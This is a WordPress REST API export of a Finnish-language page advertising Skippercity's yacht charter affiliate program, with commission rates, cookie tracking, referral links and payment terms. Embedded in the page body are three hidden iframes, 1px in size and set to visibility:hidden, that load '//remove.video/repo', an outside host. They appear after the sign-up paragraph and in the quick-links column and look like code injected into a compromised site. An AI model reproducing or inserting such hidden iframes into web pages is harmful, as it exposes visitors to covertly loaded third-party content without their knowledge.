{"id":412099,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/yacht-charter-affiliate-program\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"yacht-charter-affiliate-program","status":"publish","type":"page","link":"https:\/\/skippercity.com\/fi\/yacht-charter-affiliate-program\/","title":{"rendered":"Yacht Charter Affiliate Program"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412099\" class=\"elementor elementor-412099 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Yacht Charter Affiliate Program<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Pikatietoja:<\/strong><\/span><\/p>\n<ul>\n<li>Eniten maksava kumppanuusohjelma<\/li>\n<li>20-25% veneenvuokrauksesta saadusta palkkiosta<\/li>\n<li>Elinik\u00e4iset palkkiot<\/li>\n<li>365 p\u00e4iv\u00e4n ev\u00e4steiden vanhentumisaika<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tSis\u00e4llysluettelo\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Yacht Charter Affiliate Program<\/h2>\n<p>Jos sinulla on verkkosivusto, jonka asiakkaat saattavat olla kiinnostuneita jahtien &#8211; purjeveneiden, gulettien, moottorijahtien, superjahdit &#8211; vuokraamisesta l\u00e4hes kaikkialla maailmassa, olisimme kiinnostuneita yhteisty\u00f6st\u00e4 kanssasi kumppanuuskumppanuudessa.<\/p>\n<p><u><b>Rakastamme kumppaneita!<\/b><\/u><\/p>\n<p>Yachtcon kumppanuusohjelman avulla voit aloittaa rahan ansaitsemisen jahdin vuokrauksesta lis\u00e4\u00e4m\u00e4ll\u00e4 linkin omalta sivustoltasi meid\u00e4n sivustollemme.<\/p>\n<h2>Miten se toimii?<\/h2>\n<p>Kun asiakas <strong>klikkaa linkki\u00e4si verkkosivustollasi<\/strong> (tai blogissasi tai sosiaalisessa mediassa), p\u00e4\u00e4tyy sivustollemme ja vuokraa sitten veneen kauttamme, sinulle hyvitet\u00e4\u00e4n prosenttiosuus palkkiosta ehtojemme mukaisesti. Kaikkea seurataan (s\u00e4hk\u00f6isesti ja offline), ja me seuraamme liidien tilaa puolestasi.<\/p>\n<p><strong>V\u00e4litt\u00e4j\u00e4 (eli me) ansaitsee palkkion<\/strong> veneen varauksen nettoarvosta (ei sis\u00e4ll\u00e4 APA:ta tai tilattuja lis\u00e4varusteita tai -palveluita). Palkkio riippuu sijainnista, venetyypist\u00e4 ja toimialan palkkioista. <strong>Kumppani (eli sin\u00e4) saa %-25%<\/strong> peruskorvausta t\u00e4st\u00e4 v\u00e4litt\u00e4j\u00e4lt\u00e4 saadusta palkkiosta.<\/p>\n<p><b>Skippercity on ylpe\u00e4 siit\u00e4, ett\u00e4 se seuraa uskollisesti kaikkia tilauslentoasiakkaita, ja siksi kumppanit saavat korvauksen ansaitsemalla %-25% prosenttia provisioistamme kaikista meille palaavien asiakkaiden varauksista.<\/b><\/p>\n<p>J\u00e4rjestelm\u00e4mme j\u00e4ljitt\u00e4\u00e4 asiakkaat, jotka ovat aiemmin kyselleet kumppanilta tai tehneet varauksen kumppanilta, joten voimme aina palauttaa palkkiot kumppanille. Skippercity kunnioittaa esittely\u00e4 ja tarjoaa kumppaneille esittelypalkkion, jos asiakas palaa Skippercityyn kumppaniohjelman ulkopuolella (eli ilman ev\u00e4steit\u00e4) kunnioittaakseen meille antamaansa linkki\u00e4, koska h\u00e4n on aiemmin tullut meille kumppanin kautta.<\/p>\n<p>3 000 euroa on keskim\u00e4\u00e4r\u00e4inen nettoarvopalkkio, jolla voit aloittaa palkkion saamisen. Sovellamme k\u00e4ytt\u00f6ehtojamme.<\/p>\n<p>Meill\u00e4 on sinulle kyselytapoja, tyylikk\u00e4it\u00e4 kuvia ja painikkeita. N\u00e4m\u00e4 kaikki ovat saatavilla kumppanisi &#8221;kojelaudalta&#8221;, joten sinun tarvitsee vain kopioida ja liitt\u00e4\u00e4 koodi verkkosivuillesi, ja kaikki ovat valmiita l\u00e4htem\u00e4\u00e4n!<\/p>\n<p>URL-osoitteesi kumppaneille on https:\/\/skippercity.com\/?ref=username. Asennat vain koodin (?ref=?ref=?ref=k\u00e4ytt\u00e4j\u00e4tunnus) mink\u00e4 tahansa Skippercityyn johtavan linkin loppuun, ja kaikkea valvotaan sielt\u00e4 k\u00e4sin!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/fi\/liity-kumppaniksemme\/\">Jos olet kiinnostunut rekister\u00f6itym\u00e4\u00e4n kumppanuusohjelmaamme, klikkaa t\u00e4st\u00e4 rekister\u00f6ity<\/a> \u00e4ksesi ja k\u00e4sittelemme hakemuksesi ohjelmaan liittymiseksi.<\/p>\n<p>Kaikki SkipperCityn verkkosivuston sis\u00e4lt\u00f6 on tekij\u00e4noikeudella suojattua. Emme rohkaise yhteisty\u00f6kumppaneitamme k\u00e4ytt\u00e4m\u00e4\u00e4n mit\u00e4\u00e4n https:\/\/skippercity.com -sivuston sis\u00e4lt\u00f6\u00e4 ja kopioimaan tai monistamaan materiaalia omalle verkkosivustolleen jollakin tavalla omaksi sis\u00e4ll\u00f6kseen. Voit kuitenkin keksi\u00e4 omaa sis\u00e4lt\u00f6\u00e4 ja linkitt\u00e4\u00e4 sen meihin.<\/p>\n<h2>Miten seuraamme myynti\u00e4<\/h2>\n<p>Kaikki sivustoltasi tulevat asiakkaat &#8221;kypsennet\u00e4\u00e4n&#8221; ja tilisi yhdistet\u00e4\u00e4n ev\u00e4steiden avulla. Kun asiakas l\u00e4hett\u00e4\u00e4 meille tiedustelun tai luo tilin meille, teemme sen, mink\u00e4 osaamme parhaiten &#8211; suosittelemme oikeaa venett\u00e4, j\u00e4rjest\u00e4mme sopimuksen ja maksut ja j\u00e4rjest\u00e4mme asiakkaan p\u00e4\u00e4syn alukselle.<\/p>\n<p>Jos asiakas, joka vuokraa jahdin, tulee verkkosivustoltasi, jaamme kanssasi osan palkkiosta.<\/p>\n<h2>Miten sinulle maksetaan?<\/h2>\n<p>Maksamme yhteisty\u00f6kumppaneillemme pankkisiirrolla tai Stripen kautta.<\/p>\n<p>Kumppaneille maksetaan palkka kuukauden kuluttua siit\u00e4, kun tilaus on saatu hyv\u00e4ksytt\u00e4v\u00e4sti p\u00e4\u00e4t\u00f6kseen &#8211; t\u00e4m\u00e4 on alan normi kaikille kiinnostuneille osapuolille. Kaikille osallistujille maksetaan rahtipurjehduksen onnistuneen loppuunsaattamisen j\u00e4lkeen, koska jos rahtauksen aikana ilmenee ongelmia, haluamme varmistaa, ett\u00e4 v\u00e4litt\u00e4j\u00e4t, jahtinhoitajat, kipparit ja omistajat ratkaisevat ne ennen kuin asiakkaat poistuvat jahdilta.<\/p>\n<p>Kaikkien peruuntuneiden (asiakkaiden tai omistajien tekemien) vuokrasopimusten osalta tyt\u00e4ryhti\u00f6ille, matkatoimistoille ja kaikille suosittelijoille ei makseta mit\u00e4\u00e4n provisioita.<\/p>\n<h2>Kuinka rekister\u00f6ity\u00e4 kumppanuusohjelmaan<\/h2>\n<p>Sinulla on oltava olemassa oleva verkkosivusto, blogi tai sosiaalinen verkosto, jolla on asiakaskunta, joka t\u00e4ydent\u00e4\u00e4 jahdin vuokrausta (matkailu, ylellisyystuotteet, concierge-palvelut jne.), jotta voit hakea kumppanuusohjelmaan.<\/p>\n<p>Sinulla ei ole mit\u00e4\u00e4n riski\u00e4 tai kustannuksia kumppaniohjelmaan. Sinun tarvitsee vain <a href=\"https:\/\/skippercity.com\/fi\/liity-kumppaniksemme\/\">t\u00e4ytt\u00e4\u00e4 verkkolomakkeemme<\/a>.<iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/fi\/liity-kumppaniksemme\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Rekister\u00f6idy meid\u00e4n Yacht Charter Affiliate Program<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Pikalinkit:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/fi\/liity-kumppaniksemme\/\">Rekister\u00f6idy\/ilmoittaudu<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/fi\/kumppanin-kirjautuminen\/\">Kirjaudu sis\u00e4\u00e4n<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/fi\/tilini-2\/\">Kumppanitilisi<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Yacht Charter Affiliate Program Pikatietoja: Eniten maksava kumppanuusohjelma 20-25% veneenvuokrauksesta saadusta palkkiosta Elinik\u00e4iset palkkiot 365 p\u00e4iv\u00e4n ev\u00e4steiden vanhentumisaika Sis\u00e4llysluettelo Yacht Charter Affiliate Program Jos sinulla on verkkosivusto, jonka asiakkaat saattavat olla kiinnostuneita jahtien &#8211; purjeveneiden, gulettien, moottorijahtien, superjahdit &#8211; vuokraamisesta l\u00e4hes kaikkialla maailmassa, olisimme kiinnostuneita yhteisty\u00f6st\u00e4 kanssasi kumppanuuskumppanuudessa. Rakastamme kumppaneita! Yachtcon kumppanuusohjelman avulla voit aloittaa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412099","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/pages\/412099","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/comments?post=412099"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/pages\/412099\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/fi\/wp-json\/wp\/v2\/media?parent=412099"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}